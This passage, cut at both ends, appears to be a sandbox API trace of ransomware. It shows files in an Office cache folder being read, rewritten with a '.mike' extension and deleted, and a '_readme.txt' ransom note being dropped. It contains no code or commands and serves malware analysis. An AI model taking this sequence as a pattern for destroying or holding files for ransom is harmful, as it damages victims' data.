Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.804] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.804] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.805] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.805] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.805] GetFileType (hFile=0x264) returned 0x1 [0041.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.805] GetFileType (hFile=0x264) returned 0x1 [0041.805] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.805] WriteFile (in: hFile=0x264, lpBuffer=0x211d854*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x211d854*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.806] CloseHandle (hObject=0x264) returned 1 [0041.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.806] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x211d328 | out: lpFileInformation=0x211d328*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.806] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.806] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.806] GetFileType (hFile=0x264) returned 0x1 [0041.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.807] GetFileType (hFile=0x264) returned 0x1 [0041.807] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.807] ReadFile (in: hFile=0x264, lpBuffer=0x211e990, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x211e990*, lpNumberOfBytesRead=0x2af110*=0x10b2, lpOverlapped=0x0) returned 1 [0041.842] CloseHandle (hObject=0x264) returned 1 [0041.843] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.843] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.843] GetFileType (hFile=0x264) returned 0x1 [0041.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.843] GetFileType (hFile=0x264) returned 0x1 [0041.843] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.843] WriteFile (in: hFile=0x264, lpBuffer=0x2126aa4*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2126aa4*, lpNumberOfBytesWritten=0x2af124*=0x10c0, lpOverlapped=0x0) returned 1 [0041.844] CloseHandle (hObject=0x264) returned 1 [0041.844] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.845] GetFileType (hFile=0x264) returned 0x1 [0041.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.845] GetFileType (hFile=0x264) returned 0x1 [0041.846] WriteFile (in: hFile=0x264, lpBuffer=0x2129ee4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2129ee4*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.846] CloseHandle (hObject=0x264) returned 1 [0041.846] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.846] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.847] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe31ea3a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe31ea3a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe325c7c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0)) returned 1 [0041.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.847] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.847] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.847] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x212b6a4 | out: lpFileInformation=0x212b6a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe31ea3a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe31ea3a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe325c7c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0)) returned 1 [0041.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.847] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.847] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0041.847] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.847] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0041.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.848] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.849] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.849] GetFileType (hFile=0x264) returned 0x1 [0041.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.849] GetFileType (hFile=0x264) returned 0x1 [0041.849] WriteFile (in: hFile=0x264, lpBuffer=0x212d3c4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x212d3c4*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.850] CloseHandle (hObject=0x264) returned 1 [0041.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpFilePart=0x0) returned 0x46 [0041.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", lpFilePart=0x0) returned 0x49 [0041.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpFilePart=0x0) returned 0x4b [0041.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpFilePart=0x0) returned 0x4a [0041.851] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x57 [0041.851] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", lpFilePart=0x0) returned 0x4c [0041.851] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.851] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.851] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.851] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.864] GetFileType (hFile=0x264) returned 0x1 [0041.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.865] GetFileType (hFile=0x264) returned 0x1 [0041.865] CloseHandle (hObject=0x264) returned 1 [0041.865] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.865] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.865] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.865] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x213c310 | out: lpFileInformation=0x213c310*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915)) returned 1 [0041.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.865] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.865] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x213c644 | out: lpFileInformation=0x213c644*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915)) returned 1 [0041.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.865] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.866] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, 